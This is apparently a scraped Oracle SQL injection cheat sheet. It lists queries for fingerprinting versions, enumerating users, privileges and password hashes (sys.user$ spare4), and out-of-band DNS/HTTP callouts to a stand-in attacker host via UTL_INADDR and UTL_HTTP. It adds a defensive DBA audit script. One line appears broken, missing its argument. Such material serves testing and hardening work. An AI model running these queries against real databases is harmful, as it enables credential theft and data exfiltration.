Oracle SQL Injection Cheat Sheet

Source: Internet
Author: User
Tags: sql injection cheat sheet

SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


SELECT name FROM sys.user$; -- priv
SELECT name, spare4 FROM sys.user$; -- priv, 11g
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a special priv

SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
-- Also query TNS listener for other databases. See tnscmd (services | status).
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';
SELECT owner, table_name FROM all_tables;



SELECT bitand(6, 1) FROM dual; -- returns 0


SELECT CAST(1 AS int) FROM dual;


SELECT CASE WHEN 1 = 2 THEN 1 ELSE 2 END FROM dual; -- returns 2

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered/slow
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Java can be used to execute commands if it's installed.
ExtProc can sometimes be used too, though it normally failed for me. :-(
UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
Java can be used to read and write files if it's installed (it is not available in Oracle Express).
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
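
A hardening check built from the items above, as an added example that is not part of the original cheat sheet: it reports who may execute the UTL_* packages named on this page, who holds SELECT ANY DICTIONARY, whether utl_file_dir is set, and whether the Java VM is installed. It assumes a DBA account on 11g or later; DBA_TAB_PRIVS, DBA_REGISTRY, DBA_NETWORK_ACLS and the 'JAVAVM' component id are standard Oracle dictionary names that do not appear on the page.

```sql
-- Added audit example (not from the original cheat sheet).
-- Run as a DBA; each query maps to one technique listed above.

-- 1. Who can execute the packages used for DNS/HTTP callouts and file access?
--    An EXECUTE grant to PUBLIC means any account reachable through an
--    injectable query can call them.
SELECT grantee, owner, table_name AS package_name, privilege
FROM   dba_tab_privs
WHERE  privilege  = 'EXECUTE'
AND    table_name IN ('UTL_INADDR', 'UTL_HTTP', 'UTL_FILE')
ORDER  BY table_name, grantee;

-- 2. Which accounts hold SELECT ANY DICTIONARY? That privilege is what
--    makes the "priv" queries against the data dictionary work.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'SELECT ANY DICTIONARY'
ORDER  BY grantee;

-- 3. Is utl_file_dir set? Any non-null value is a directory that UTL_FILE
--    can read and write; no rows or a NULL value is the desired result.
SELECT name, value
FROM   v$parameter2
WHERE  name = 'utl_file_dir';

-- 4. Is the Java VM component installed? The page notes Java enables
--    command execution and file access when it is present.
SELECT comp_id, comp_name, version, status
FROM   dba_registry
WHERE  comp_id = 'JAVAVM';

-- 5. Which outbound hosts and ports do network ACLs allow (11g and later)?
--    Broad entries such as host '*' let UTL_HTTP and UTL_INADDR reach
--    arbitrary destinations.
SELECT host, lower_port, upper_port, acl
FROM   dba_network_acls
ORDER  BY host;
```

Rows granting EXECUTE to PUBLIC in query 1, or a wildcard host in query 5, are the first things to review against the application account's actual needs.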
